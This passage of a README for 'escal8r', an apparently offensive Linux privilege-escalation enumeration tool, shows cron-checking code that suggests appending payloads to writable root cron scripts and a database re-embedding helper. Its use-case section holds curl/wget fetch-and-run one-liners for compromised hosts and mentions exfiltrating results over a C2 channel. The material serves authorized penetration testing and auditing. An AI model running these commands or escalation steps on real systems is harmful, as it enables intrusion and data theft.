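    print(f"[{severity}] {title}\n  {description}\n  [EXPLOIT]: {exploit}")


# Crontab locations; the spool path differs between Debian and RHEL families.
CRON_SOURCES = ["/etc/crontab", "/etc/cron.d/*",
                "/var/spool/cron/crontabs/*", "/var/spool/cron/*"]
ABS_PATH = re.compile(r'(?<!\S)(/[^\s:;>|&]+)')      # absolute paths in a command field


def writable_cron_scripts(crontab_text, isfile=os.path.isfile,
                          writable=lambda p: os.access(p, os.W_OK)):
    """Return (path, entry) for every script a crontab runs that this user can
    modify: the file itself is writable, or its directory is (replace the file)."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" in line.split()[0]:        # blank, or PATH=/MAILTO= assignment
            continue
        for path in ABS_PATH.findall(line):
            if isfile(path) and (writable(path) or writable(os.path.dirname(path))):
                hits.append((path, line))
    return hits


class CronEnumerator:
    def __init__(self):
        self.results = {}

    def check_writable_cron_scripts(self):
        """Flag cron entries whose target script the current user can change."""
        findings = []
        for pattern in CRON_SOURCES:
            for crontab in glob.glob(pattern):
                try:
                    with open(crontab) as fh:
                        text = fh.read()
                except OSError:
                    continue                          # spool entries of other users
                for path, entry in writable_cron_scripts(text):
                    # system crontabs carry a user field; "root" there makes this a direct path
                    severity = "CRITICAL" if " root " in f" {entry} " else "HIGH"
                    findings.append({"crontab": crontab, "script": path, "entry": entry})
                    print_finding(severity, f"Writable cron script: {path}",
                                  f"referenced from {crontab}: {entry}",
                                  f"append a payload to {path} and wait for the next run")
        self.results["writable_cron_scripts"] = findings
        return self.results


if __name__ == "__main__":
    # In main(): all_results.update(CronEnumerator().check_writable_cron_scripts())
    print(CronEnumerator().check_writable_cron_scripts())
```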

Updating Exploit Databases

The script reads only the embedded copies, so editing a JSON file has no effect until its contents are copied back into the matching variable:

  1. Edit the JSON files:
vim data_kernel_exploits.json
# Add new CVE entry
  2. Re-embed into escal8r.py:
# The databases are already embedded in escal8r.py
# Paste the updated JSON into the matching variable (GTFOBINS_DB, KERNEL_EXPLOITS_DB,
# SUDO_EXPLOITS_DB or CAPABILITIES_DB), after confirming the file still parses as JSON
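A small build step that automates the re-embedding described here and in "How Databases Are Used", as an added example (not a script shipped with the project). It reads each data_*.json, validates it, and rewrites the matching NAME = r"""...""" assignment in the script; the variable names are the ones the README gives, the rest is assumed. A raw triple-quoted string cannot contain """ or end with a backslash, so those cases fall back to repr(), and the verify step execs only the assignments (never the whole script) and parses them back before anything is written.

```python
import json
import pathlib
import re

# File -> embedded variable, as named in the README.
DB_FILES = {
    "data_gtfobins.json": "GTFOBINS_DB",
    "data_kernel_exploits.json": "KERNEL_EXPLOITS_DB",
    "data_sudo_exploits.json": "SUDO_EXPLOITS_DB",
    "data_capabilities.json": "CAPABILITIES_DB",
}


def embed_literal(text):
    """Python source literal for text, in the script's r\"\"\"...\"\"\" style when that is safe."""
    if '"""' not in text and not text.endswith("\\"):
        return 'r"""' + text + '"""'
    return repr(text)


def render_assignment(name, json_text):
    """NAME = r\"\"\"<compact json>\"\"\"; raises ValueError if the file is not valid JSON."""
    obj = json.loads(json_text)
    compact = json.dumps(obj, separators=(",", ":"), sort_keys=True)
    return f"{name} = {embed_literal(compact)}\n"


def assignment_pattern(name):
    # raw triple-quoted form, or the one-line repr() fallback
    return re.compile(r'^' + re.escape(name)
                      + r'\s*=\s*(?:r?"""[\s\S]*?"""|\'.*\'|".*")[ \t]*\n', re.M)


def replace_assignment(source, name, new_block):
    pat = assignment_pattern(name)
    if pat.search(source):
        return pat.sub(lambda _m: new_block, source, count=1)   # lambda: no backslash mangling
    return source.rstrip("\n") + "\n\n" + new_block             # first embedding of this DB


def embed_sources(source, data_by_file):
    """data_by_file maps a data_*.json filename to its text; returns updated script source."""
    for fname, var in DB_FILES.items():
        if fname in data_by_file:
            source = replace_assignment(source, var, render_assignment(var, data_by_file[fname]))
    return source


def verify(source, names=tuple(DB_FILES.values())):
    """Exec each *_DB assignment in isolation and json.loads it; -> {name: parsed object}."""
    ns = {}
    for name in names:
        m = assignment_pattern(name).search(source)
        if m:
            exec(m.group(0), {"__builtins__": {}}, ns)
    return {k: json.loads(v) for k, v in ns.items()}


def embed_all(script_path, data_dir="."):
    base = pathlib.Path(data_dir)
    data = {f: (base / f).read_text() for f in DB_FILES if (base / f).is_file()}
    return embed_sources(pathlib.Path(script_path).read_text(), data)


if __name__ == "__main__":
    import sys
    script = sys.argv[1] if len(sys.argv) > 1 else "escal8r.py"
    new_src = embed_all(script, sys.argv[2] if len(sys.argv) > 2 else ".")
    print({k: type(v).__name__ for k, v in ver.items()} if (ver := verify(new_src)) else "no DB found")
    pathlib.Path(script).write_text(new_src)
```

Run it as `python3 embed_dbs.py escal8r.py .` from the repository root (the file name is an assumption). Sorting keys and using compact separators keeps the embedded blob deterministic, so a diff of escal8r.py shows only the real database change.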

🎯 Use Cases

1. Penetration Testing

# After gaining initial foothold (web shell, RCE):
wget http://yourserver.com/escal8r.py -O /tmp/e.py && python3 /tmp/e.py

2. CTF Competitions

# Quick privilege escalation enumeration:
curl http://10.10.14.5/escal8r.py | python3 | grep -E "CRITICAL|HIGH"

3. Red Team Operations

# Automated enumeration from a C2 implant. execute-assembly runs .NET assemblies
# and does not apply to a Python script; use the implant's shell/run primitive:
curl -s http://yourserver.com/escal8r.py | python3 > /tmp/.results
# Exfiltrate /tmp/.results via the C2 channel

4. Security Auditing

# Defensive use - find privilege escalation risks:
python3 escal8r.py > audit_report_$(hostname)_$(date +%Y%m%d).txt

⚠️ Legal Disclaimer

IMPORTANT: This tool is designed for authorized security testing only.

  • ✅ Use on systems you own or have explicit permission to test
  • ✅ Use in controlled CTF/lab environments
  • ✅ Use for authorized penetration testing engagements
  • ❌ Do NOT use on systems without authorization
  • ❌ Unauthorized access to computer systems is illegal

The authors assume no liability for misuse or illegal use of this tool.


🤝 Contributing

Contributions are welcome! Areas for improvement:

  • Add more kernel exploits (2024+ CVEs)
  • Expand GTFOBins database
  • Add Windows compatibility layer
  • Build pure Bash version (no Python required)
  • Add ACL and extended attribute checks
  • Improve container escape detection
  • Add Active Directory enumeration for Linux-joined systems

📜 Credits

Escal8r combines techniques and databases from:

  • LinEnum
  • LinPEAS (PEASS-ng)
  • AutoLocalPrivilegeEscalation
  • GTFOBins
📈 Version History

v1.0.0 (2025-11-06)

  • ✅ Initial release
  • ✅ 139+ enumeration checks
  • ✅ 16 enumeration classes
  • ✅ Kernel, sudo, and capability exploit matching
  • ✅ GTFOBins integration
  • ✅ Container and cloud detection
  • ✅ Single-file deployment

📧 Contact

For bug reports, feature requests, or questions:


Happy Hunting! 🎯

About

An all-in-one Linux Privilege Escalation script that merges the core functionality and vectors of LinEnum, PEASS-ng, and AutoLocalPE. Delivers a consolidated, high-impact report to identify the fastest path to root.
